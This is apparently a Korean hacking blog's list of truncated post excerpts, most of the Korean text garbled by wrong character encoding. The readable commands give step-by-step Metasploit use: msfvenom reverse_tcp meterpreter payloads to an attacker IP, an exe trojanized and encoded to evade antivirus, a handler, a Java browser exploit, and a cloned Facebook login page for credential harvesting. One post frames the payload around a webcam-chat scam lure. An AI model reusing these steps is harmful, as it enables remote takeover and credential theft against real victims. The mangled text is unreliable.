ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. 2023.08.18 - [Metasploit/Kali & Backtrack] - ๋ชจ์ํดํน์ ํด๋ณด์!-armitageํธ ๋ชจ์ํดํน์ ํด๋ณด์!-armitageํธ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์ blog.z3alous.xyz ๋ช์ผ ์ ์ ์์ ๊ธ์ ์์ฑํ์๋ค. ์ด..

ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์ฝ 1๋ฌ ์ ์ฏค toss์์ ๋ง๋ค์ด์ง ์์์ ๋ณด์๋ค. ํด๋น์์์ด๋ค. https://youtu.be/tAqgvP07RnQ ํด๋น ์์์ ๋ณด๋๋์ ์๊ฐ ๊ฐ๋์ค ๋ชจ๋ฅด๊ณ ๊ณ์ ๋ณด๊ณ ์์๋ค. ํด๋น ๋์์์ ๋์ค๋ ๋ถ๋ค์ ์ค์ ๋ก ์๋ ๋ถ๋ค์ด์ง๋ง ์ด๋ ๊ฒ ๋ณด๋ ๋๋์ฑ ๋ฉ์์ด ๋ณด์๋ค. 'ํ ์ค๋ฅผ ํดํนํ๋ ์' ๋ผ๋ ์์์ ๋ณด๊ณ ์ฌ๋ฌ๊ฐ์ง์ ํฅ๋ฏธ๋ฅผ ๊ฐ์ก๋ค. forensic์ ์ฃผ๋ก ํ๋ ๋์๋๋ฐ ์ ๋ฌด๋ฅผ ํ๋ฉด์ ์กฐ๊ธ์ฉ ์ทจ์ฝ์ ๊ณผ ๋ชจ์ํดํน..
๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์ํ๋ ํฌํธ] -f exe > filename.exe ๊ทธ๋ผ /root ํด๋์ exeํ์ผ์ด ์๊ธด๊ฒ์ ํ์ธํ ์ ์๋ค.๊ทธ๋ผ ๋ค์์ผ๋ก๋ ์ปจํธ๋กคํ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ค์ด๋ณด์. ๋จผ์ msfconsole์ ์ ๋ ฅํ๋ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์ฐ๋ฆฌ๊ฐ ํ์ผ์ ๋ง๋ค๋ ์ฌ์ฉํ payload]set LHOST [attacker ip]set LP..
๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. ๋จผ์ ํ๊ธฐ์ ์ ๋ฆฌ๋ ์ค์์ service apache2 startservice postgresql startservice metastploit start ๋ช ๋ น์ด๋ค์ ์คํ ์์ผ์ค๋ค. ๊ทธ ํ msfconsole์ ํด์ค๋ค. ๊ทธ๋ผ ์์๊ฐ์ ์ฐฝ์ด ๋ฐ๊ฒ์ด๋ค. (๊ทธ๋ฆผ์ ๋ค๋ฅผ ์ ์๋ค.) ๊ทธ ํ ์ฐ๋ฆฌ๊ฐ ํด์ผํ ์ผ์ ํธ๋ค๋ฌ๋ฅผ ๋ง๋๋ ์ผ์ด๋ค.use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ ๋ค. ์ฐ๋ฆฌ๊ฐ ๋ค์ ํด์ผ ํ ํ๋์ผ๋ก show options ์ ์ด์ฉํ์ฌ ์ฐ๋ฆฌ๊ฐ ์ ํด์ค์ผํ๋ ๊ฒ์ ๋ณธ๋ค. ๋จผ์ URIPATH ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฒฝ๋ก๋ฅผ ์ง์ ํด์ค๋ค. / ํด๋๋๊ณ test๋ฅผ ํด๋๋๋ค. ์ง์ ํ์ง..
์์ฆ ๋ชธ์บ ์ด ์ ํ์ ํ์๋ค. ๋์ถฉ ์๋ฆฌ๋ฅผ ๋ณด๋ฉด ์ค์นดxx๊ฐ์ ๊ณณ์์ ์ฑํ ์ ํ๋ค๊ฐ ๋ชธ์บ ์ ํ์๊ณ ํ์ผ์ ๋ฐ์ผ๋ผ๊ณ ํ๋ค. (๋ชธ์บ ์ ํ๊ธฐ์ํ ์ ์ฉ ํ์ผ์ด๋ผ ๋ปฅ์ ์น๋ค.) ๊ทธ๋ฌ๊ณ ํ์ผ์ ๋ณด๋ด๋๋ฐ ๊ทธ ํ์ผ์ ๋น์ฐํ ์ ์ฑ์ฝ๋ !! :) ์ด์ ๊ทธ๊ฒ์ ์ฌ์ฐํด๋ณด์ ๊ทธ์ ์ ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.์์ํด๋ณด์ :X ๋จผ์ service apache2 start๋ก ์ํ์น๋ฅผ ์คํ ์์ผ์ฃผ๊ณ service postgresql start ๋ก postgresql ๋ํ ์ํจ๋ค. ๊ถ๊ทน์ ์ธ ๋ช ๋ น์ด service metasploit start ๋ก metasploit ๋ํ ์คํ์ํจ๋ค. ๊ทธ ํ ์ด์ ์ ์ฑ์ฝ๋๋ฅผ ๋ง๋ค์ด์ผ ํ๋๋ฐ...๋ช ๋ น์ด msfvenom์ ์ด์ฉ ํ์ฌ ๋ง๋ค์ด ๋ณด์.msfvenom -p android/meterpreter/..
๋ชจ๋ ์ฌ์ฉ์ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. msfvenom -a ์ํคํ ์ณ --platform ํ๋ซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ํธ๋ค๋ฌ์์ ํ๋ก์ธ์ค ์ฎ๊ธฐ๋ ๋ช ๋ น์ด migrate ํ๋ก์ธ์ค ๋๋ฒ ex) migrate 1111
๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ธ์. ๋จผ์ Kali linux or parrot linux์์ ํฐ๋ฏธ๋์ open setoolkit์ ์ ๋ ฅํ๋ค. ์ ๋ ฅ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ ํ์ธ ํ์ค์ ์์ต๋๋ค. ์ฌ๊ธฐ์ Social-Engineering Attacks๋ฅผ ํด์ผํ๊ธฐ ์ํด 1๋ฒ์ ์ ๋ ฅํฉ๋๋ค. ๋ค์์ Website Attack Vectors์ ์ํด 2๋ฒ ์ฌ๊ธฐ์์ Credential Harvester Attack Method๋ฅผ ์ํด 3๋ฒ facebook์ ๋ง๋ค๊ธฐ ์ํด 2๋ฒ์ ํด๋ฆญํฉ๋๋ค. ์ฌ๊ธฐ๊น์ง ํ์ จ์ผ๋ฉด ๋ฐ์์ต๋๋ค. 2๋ฒ์ ํ์ จ์ผ๋ฉด IP๋ฅผ ์ ๋ ฅํ์๋ฉด ๋๋๋ฐ์! ip๋ฅผ ์ ๋ ฅํ๋ฉด ์ด์ cloneํ๊ธฐ ์ํ ์ฌ์ดํธ๋ฅผ ์ ๋ ฅํ์๋ฉด ๋ฉ๋๋ค. ์ ๋ facebook.com์ ํ๊ธฐ์ํด http://faceboo..
ํฌํธ์ค์บ๋์ ๊ดํ ์ด์ผ๊ธฐ๋ฅผ ๊ณ์ํ๊ฒ ์ต๋๋ค. ์์์ ๋งํ๊ฑฐ์ ๊ฐ์ด ํฌํธ์ค์บ๋์๋ nmap ๊ฐ์ด ์ ๋ช ํ ๋๊ตฌ๊ฐ ์์ต๋๋ค. ์ฐ๋ฆฌ๋ msf ๋ณด์กฐ๊ธฐ๋ฅ์ ์ด์ฉํด๋ณด๊ฒ ์ต๋๋ค. 1. use auxiliary/scanner/smb/smb_version 2. set rhosts 192.168.32.0/24 192.168.32.0/24๋ฅผ ์ด์ฉํด ๋์ญ์ ์ค์บํ๋ ๊ฒ์ด๋ค. 3. set threads 256 ์ด๋ฌ๊ฒ ํจ์ผ๋ก run์ ํ ์ ์๋ค. ์ฌ๊ธฐ์ ์กฐ๊ธ๋ ์์ธํ ์๊ณ ์ถ๊ณ ์์ดํผ๋ฅผ ์๋ค๋ฉด 1. use auxiliary/scanner/netbios/nbname 2. set rhosts IP 3. set threads 256 ์ด๋ ๊ฒ ํ๋ฉด run์ ํ ์ ์๋ค. IP๋์ญ์ ์ด์ฉํ์ฌ mysql ํ์ํ๋ ๋ฐฉ๋ฒ 1. use auxiliary..
์์์ ๊ธ์์๋ msfconsole ์์ company_name ์ ์ด์ฉํด์ ์์ ๋ณด์๋ค.์ด๋ฒ์๋ company_name ์์ ์์๋ธ ์ ๋ณด๋ฅผ ์ด์ฉํ์ฌ ๋ณด์. ์ด๋ฅผ ์ด์ฉํ์ฌ ๋ณด์ .1. use auxiliary/gather/corpwatch_lookup_id์ด๋ name ์ฒ๋ผ ๋ณด์กฐ๊ธฐ๋ฅ์ ์ฌ์ฉํ๋๋ฐ name ๋์ ์ id๋ฅผ ์ด์ฉํ๊ฒ ๋ค๋ ๊ฒ์ด๋ค. 2. set cw_id cw_40155์ด๋ ๊ฒ ์์ด๋๋ฅผ ์ง์ ํ์ค๋ค. 3. set get_history true (true๋ฅผ ์๋ตํ๋ false๋ก ๊ฐ์ฃผ ํ๋ค.) ๋ค์์ run run์ ํ๊ฒ ๋๋ฉด cw_id์ ์ ๋ ฅํ ๊ฐ์ ๊ธฐ๋ฐ์ผ๋ก ๊ฒ์์ ํ๋ค. ์ด๋ฌํ๋ฏ ๋ง์ ์ ๋ณด๋ฅผ ์ป์ ์ ์๋ค. ๋ํ cw_~~~.txt๋ก ์ ์ฅ๋ ํด์ค๋ค. ๋ค์์ msf์์ ๋ณด์กฐ ๊ธฐ๋ฅ์ ์ด์ฉํ์ฌ ํฌํธ์ค์บ๋์..
๊ณผ์ฐ ์ ๋ชฉ์์ ๋งํ msf๋ ๋ฌด์์ผ๊น?msf๋ Metasploit Framework์ด๋ค. ์ด๋ ํ์ธ์ด๋ก ์์ฑํ ๋ชจ์ ์นจํฌ ๋๊ตฌ์ธ๋ค. ๊ณผ์ฐ kali linux์์ ์ด๋ป๊ฒ ์คํ ์ํฌ๊น?1. service postgresql start ์ด ๋ช ๋ น์ด๋ postgresSQL ์๋ฒ๋ฅผ ์คํ์ํค๋ ๋ช ๋ น์ด์ด๋ค. ์ด๋ ๊ฒ ํ๋ฉด postgreSQL ์๋ฒ๊ฐ ์คํ๋ ๊ฒ์ด๋ค. 2. service metasploit start (msfdb init